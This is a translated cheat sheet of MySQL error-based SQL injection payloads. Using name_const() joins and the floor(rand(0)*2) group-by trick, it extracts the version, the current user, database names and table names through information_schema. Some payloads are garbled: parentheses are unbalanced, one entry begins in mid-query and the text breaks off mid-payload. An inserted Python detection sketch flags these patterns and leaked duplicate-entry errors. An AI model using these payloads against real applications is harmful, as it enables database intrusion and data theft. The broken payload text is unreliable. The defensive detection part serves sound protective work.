MySQL Error-Based Injection Reference
Author: Pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
TeAm: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; most MySQL 5+ versions can be tested successfully.
In a few versions, using name_const() raises an error; in that case use the Method.2 test given.
Query version:
Method.1: and + exists (select * from + (select * from (select + name_const (@ version, 0) a + join + (select + name_const (@ version, 0) B) c)
Method.2: and + (SELECT + 1 + FROM + (select + count (*), concat (floor (rand (0) * 2), (SELECT + version ())) a + from + information_schema.tables + group by a) B)
Query the current user:
Method.1: and + exists (select * from + (select * from (select + name_const (user (), 0) a + join + (select + name_const (user (), 0) B) c)
Method.2: and + (select + 1 + from (select + count (*), concat (select + user () + from + information_schema.tables + limit + 0, 1 ). floor (rand (0) * 2) x + from + information_schema.tables + group + by + x))
Query the current database:
Method.1: and + exists (select * from + (select * from (select + name_const (database (), 0) a + join + (select + name_const (database (), 0) B) c)
Method.2: and + (select + 1 + from (select + count (*), concat (select + database () + from + information_schema.tables + limit + 0, 1 ). floor (rand (0) * 2) x + from + information_schema.tables + group + by + x))
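An added detection sketch (not code from the original page or its author): both methods listed above carry fixed markers in the request, and both depend on a MySQL duplicate-column or duplicate-entry error being echoed in the response, so a defender can flag either side. Rule names, sample requests and sample response bodies are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request-side markers of the two methods on this page (rule names are illustrative).
REQUEST_RULES = {
    "method1_name_const": re.compile(r"name_const\s*\(.*\bjoin\b.*name_const\s*\(", re.S),
    "method2_floor_rand_group_by": re.compile(
        r"(?=.*count\s*\(\s*\*\s*\))(?=.*floor\s*\(\s*rand\s*\()(?=.*group\s+by\b)", re.S),
    "information_schema": re.compile(r"information_schema\s*\.\s*(tables|schemata|columns)"),
}
# Response-side: the MySQL errors (1060 and 1062) these methods rely on being shown.
ERROR_LEAK = re.compile(r"duplicate column name '|duplicate entry '.*?' for key", re.I | re.S)

def normalize(raw):
    """Decode %xx and '+' (twice, for double encoding), drop /* */ comments
    and backticks, collapse whitespace, lowercase."""
    text = unquote_plus(unquote_plus(raw))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S).replace("`", "")
    return re.sub(r"\s+", " ", text).lower()

def classify_request(target):
    """Return the sorted names of the rules that match a request target."""
    text = normalize(target)
    return sorted(name for name, rx in REQUEST_RULES.items() if rx.search(text))

def leaks_sql_error(body):
    """True if a response body echoes a duplicate-column or duplicate-entry error."""
    return bool(ERROR_LEAK.search(body))

# Constructed (request target, response body) pairs, not taken from any real log.
SAMPLES = [
    ("/item.php?id=7", "<h1>Blue widget</h1>"),
    ("/item.php?id=7+and+exists(select*from(select+name_const(user(),0)a+join+"
     "(select+name_const(user(),0)b)c)", "Duplicate column name 'app@localhost'"),
    ("/item.php?id=7%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT(FLOOR("
     "RAND(0)*2),(SELECT%20VERSION()))a%20FROM%20information_schema.tables%20"
     "GROUP/**/BY%20a)b)", "Duplicate entry '15.0.91' for key 'group_key'"),
    ("/search?q=group+by+floor+plans", "No results"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(classify_request(target), leaks_sql_error(body), target[:40])
```

Parameterized queries remove the injection point, and returning a generic error page instead of the database message removes the channel both methods read from.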
Enumerate databases in sequence:
LIMIT + n, 1), 0) a + join + (select + name_const (SELECT + distinct + schema_name + FROM + information_schema.schemata + LIMIT + n, 1), 0 )) b) c)
Replace n sequentially.
Number of tables in a specified database:
and + (select + 1 + from (select + count (*), concat (select + (SELECT + count (table_name) + FROM + `information_schema`.tables + WHERE + table_schema = 0x6D7973716C) + from + information_schema.tables + limit + 0, 1), floor (rand (0) * 2) x + from + information_schema.tables + group + by + x) a) + and + 1 = 1
(0x6D7973716C is the hex encoding of the string mysql.)
Enumerate tables in sequence:
And + (select + 1 + from (select + count (*), concat (select + (SELECT + distinct + table_name + FROM + information_schema.tables + Where + t